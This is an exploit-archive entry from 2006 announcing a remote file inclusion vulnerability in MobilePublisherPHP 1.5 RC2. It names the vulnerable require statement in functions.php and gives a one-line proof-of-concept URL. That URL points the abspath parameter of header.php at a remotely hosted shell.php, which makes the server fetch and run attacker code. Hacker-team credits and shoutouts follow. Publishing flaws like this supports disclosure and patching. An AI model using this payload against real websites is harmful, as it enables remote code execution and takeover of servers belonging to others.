MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
# Published : 2006-09-17
# Author : Timq
# Previous Title : Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit
# Next Title : Q-Shop 3.5 (browse.asp) Remote SQL Injection Vulnerability

MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################

# www.Syue.com [2006-09-17]